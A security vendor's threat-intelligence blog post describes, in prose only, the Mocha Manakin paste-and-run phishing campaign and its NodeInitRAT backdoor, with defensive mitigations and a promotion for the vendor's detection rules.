Mocha Manakin Attack Detection: Hackers Spread a Custom NodeJS Backdoor Dubbed NodeInitRAT Using the Paste-and-Run Technique
Table of contents:
Mocha Manakin, believed to have ties to Interlock ransomware operations, has been observed using the paste-and-run phishing technique for initial access since at least January 2025. Adversaries deploy a custom NodeJS backdoor, dubbed NodeInitRAT, which enables persistence, reconnaissance, command execution, and payload delivery via HTTP, along with other offensive operations that can potentially lead to ransomware attacks.
Detect Mocha Manakin Paste-and-Run Attacks
Cybersecurity experts have long tracked how malicious actors leverage PowerShell to install backdoors, execute harmful scripts, and pursue offensive objectives within the organization’s infrastructure. The ongoing struggle between attackers, defenders, and security analysts continues to resemble a game of cat and mouse. PowerShell’s flexibility makes it indispensable for system admins, but equally attractive to adversaries, complicating detection efforts and making it a priority for defensive measures. In its latest campaign, Mocha Manakin uses a paste-and-run initial access technique via PowerShell to deliver a tailored NodeJS backdoor called NodeInitRAT, a threat that might escalate to ransomware, amplifying the risk for affected organizations.
Register for SOC Prime Platform to get a relevant set of Sigma rules for Mocha Manakin activity, powered by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Click the Explore Detections button and reach the curated set of SOC content for proactive cyber defense.
All the detection algorithms can be used across dozens of industry-leading SIEM, EDR, and Data Lake solutions and are aligned with MITRE ATT&CK® to accelerate threat research and assist security teams in their day-to-day SOC operations. Each Sigma rule is enriched with relevant metadata, such as CTI links, attack timelines, audit configurations, triage recommendations, and more helpful references to equip defenders with comprehensive threat context.
What is Mocha Manakin: Latest Attack Analysis
Red Canary researchers have been observing Mocha Manakin activity since January 2025 as part of a broader set of adversary clusters, leveraging paste and run for initial access. Also known as Clickfix or fakeCAPTCHA, this offensive method deceives users into running a script that retrieves additional payloads from attacker-controlled infrastructure. This can give attackers the green light to deploy diverse malicious samples, such as LummaC2, HijackLoader, Vidar, and others.
This adversary method has remained consistently prevalent and expanded in usage since August 2024. Its sustained popularity is largely due to its effectiveness in deceiving users into running harmful scripts on their devices. The versatility of paste-and-run lures, distributed through phishing emails, malicious browser injections, and more, enables adversaries to present these deceptive prompts to potential victims.
However, Mocha Manakin stands out from other similar campaigns due to its deployment of a customized NodeJS-based backdoor dubbed NodeInitRAT. The latter enables threat actors to maintain persistent access and conduct reconnaissance operations, including enumerating user principals and collecting domain-specific information. NodeInitRAT communicates via HTTP with attacker-operated servers, often relayed through Cloudflare tunnels to mask infrastructure. It can execute arbitrary commands and deliver additional malware samples to infected hosts.
Mocha Manakin shares several operational characteristics with Interlock ransomware campaigns, including the use of paste-and-run techniques for initial access, deploying the NodeInitRAT backdoor as a secondary payload, and reusing portions of the same attacker infrastructure. Notably, if left unaddressed, the malicious activity has the potential to escalate into ransomware incidents.
Paste-and-run lures typically fall into two categories: access repair lures, which deceive users into thinking they must fix access to a file or site, and fake CAPTCHA lures, which prompt users to verify they’re human to proceed, both leading to the execution of malicious commands. Once a user clicks on the Fix or Verify button within the lure, an obfuscated PowerShell command is silently copied to their clipboard. The lure then instructs them to follow so-called “verification steps,” followed by the user running an offensive script and initiating the compromise.
Upon successful execution, Mocha Manakin’s paste-and-run PowerShell command leads to the download and execution of a PowerShell loader. The latter retrieves a ZIP archive containing a legitimate node.exe binary and launches NodeInitRAT by passing the malware’s code via the command line. Once active, NodeInitRAT can establish persistence via a Windows Registry run key, conduct system and domain reconnaissance, communicate with attacker servers over HTTP, run arbitrary commands to enumerate domain controllers, trusts, admins, and SPNs, deploy additional EXE, DLL, and JS payloads, and obfuscate data transfers using XOR encoding and GZIP compression.
Defending against paste-and-run attacks poses challenges despite the tactic being well-known. Mitigations include disabling Windows hotkeys (e.g., Windows+R/X) via Group Policy to block quick script execution, though adoption is limited due to user reliance. To counter NodeInitRAT, security teams should terminate any suspicious node.exe processes, delete associated payloads like DLLs, and remove persistence mechanisms. At the network level, defenders recommend blocking or sinkholing any C2 domains and IPs tied to NodeInitRAT, as well as monitoring DNS and traffic logs for indicators of compromise.
Given Mocha Manakin and NodeInitRAT share key characteristics with Interlock ransomware activity, early detection and response are critical. Rely on SOC Primes’ complete product suite backed by AI, automation, and live threat intel to identify cyber attacks at their earliest stages and proactively safeguard your infrastructure, leaving no chance for emerging threats to go undetected on your watch.